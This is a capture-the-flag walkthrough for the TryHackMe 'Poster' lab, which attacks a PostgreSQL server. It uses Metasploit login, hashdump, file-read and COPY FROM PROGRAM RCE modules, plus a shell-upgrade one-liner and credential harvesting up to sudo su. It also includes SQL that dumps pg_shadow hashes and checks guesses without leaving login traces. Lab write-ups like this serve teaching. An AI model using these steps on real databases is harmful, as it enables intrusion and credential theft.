TryHackMe - Poster


Last updated 2 years ago

Room Link: <https://tryhackme.com/room/poster>

Introduction

RDBMS stands for relational database management system. RDBMSs have been a common option for storing financial records, manufacturing and logistics data, personnel data and much else since the 1980s. Relational databases largely replaced the older hierarchical and network databases because they were easier to implement and administer.

PostgreSQL is a free and open-source relational database management system (RDBMS) emphasizing extensibility and SQL compliance.

Recon

First, add poster.thm to your /etc/hosts file for ease of operation.

From the scan (screenshot not reproduced here) we can easily identify both the open port (Q2) and the RDBMS name (Q1). PostgreSQL listens on TCP 5432 by default, and nmap's service detection labels it as such.

Metasploit Enumeration

Launch metasploit and search for postgresql-related modules using:

search postgresql

First of all, let's look at the login module. It checks the RDBMS for weak or default credentials and gives us our initial access.

auxiliary/scanner/postgres/postgres_login

Bingo! We got the credentials. With them we can dump password hashes, read files from the server and achieve RCE.

Let's dump password hashes using another module

auxiliary/scanner/postgres/postgres_hashdump

Don't forget to plug both the username and the password into the module (the USERNAME and PASSWORD options), otherwise it will try the default wordlists again.
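What the hashdump module does underneath, as an added example (not from the original write-up, not Metasploit's own code): the same data can be pulled by hand from psql once you have the superuser login from the previous step, since pg_shadow is readable only by superusers. The role name and the candidate password in the second query are placeholders for your own guesses.

```sql
-- 1. Dump role names, password hashes and expiry (what postgres_hashdump reads).
SELECT usename, passwd, valuntil
FROM pg_shadow
WHERE passwd IS NOT NULL;

-- 2. Legacy PostgreSQL hashes are 'md5' || md5(password || username),
--    so a guess can be checked with the server's own md5() function,
--    without a single extra login attempt showing up in the logs.
--    'Password1' and 'postgres' are placeholder guesses.
SELECT usename,
       passwd = 'md5' || md5('Password1' || usename) AS candidate_matches
FROM pg_shadow
WHERE usename = 'postgres';

-- 3. Servers on 10+ may store SCRAM-SHA-256 instead; those hashes start with
--    'SCRAM-SHA-256$' and cannot be checked with the md5 trick above, so sort
--    the dump by hash type before deciding how to crack it.
SELECT usename,
       CASE WHEN passwd LIKE 'md5%'            THEN 'md5'
            WHEN passwd LIKE 'SCRAM-SHA-256$%' THEN 'scram-sha-256'
            ELSE 'other/none' END AS hash_type
FROM pg_shadow;
```

For offline cracking, hashcat and John both understand the md5 format (hash is md5 of password concatenated with the username, prefixed with the literal string md5), which is why the module prints the username alongside each hash.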

Metasploit Exploitation

auxiliary/admin/postgres/postgres_readfile

Let's use this module to read the contents of /etc/passwd file to get some initial information about the machine.

After reading /etc/passwd we have a direct clue about the user accounts on the box: look for the entries that have a home directory under /home and a real login shell.

Now it's time to finally get access to the box and escalate our privileges.

exploit/multi/postgres/postgres_copy_from_program_cmd_exec

The above module lets you achieve RCE on the system using just the RDBMS username and password. It relies on PostgreSQL's COPY ... FROM PROGRAM feature, so the account has to be a superuser (or hold the pg_execute_server_program role on newer servers); set the PAYLOAD option to match the target before running it.

Once the command has executed and you have a session, run python3 -c 'import pty; pty.spawn("/bin/bash")' to upgrade it to a tty shell.

Remember the user we identified while reading /etc/passwd? Take a look at his home directory and retrieve the credentials stored there.

Once logged in as that user, we notice he cannot run any commands with sudo, which usually means we have to go looking for credentials or misconfigurations ourselves.

Turns out there is a conf file in /var/html/www that contains both the username and the password for our last step of privilege escalation. Read it and log in as the new user.

Root

After getting onto the second account, escalating to root becomes relatively easy. Check what the account may run with sudo:

sudo -l

sudo -l shows the account may run commands as root, so from this point simply execute sudo su and enjoy the root shell :)

Thank you for reading!

Screenshot captions (the images themselves are not included in this export):

  • Recon scan (RustScan): "As always, start with the simple scan."
  • postgres_copy_from_program_cmd_exec: "It is important to set a proper payload for this module."
  • Post-exploitation: "Black: Credentials; White: User"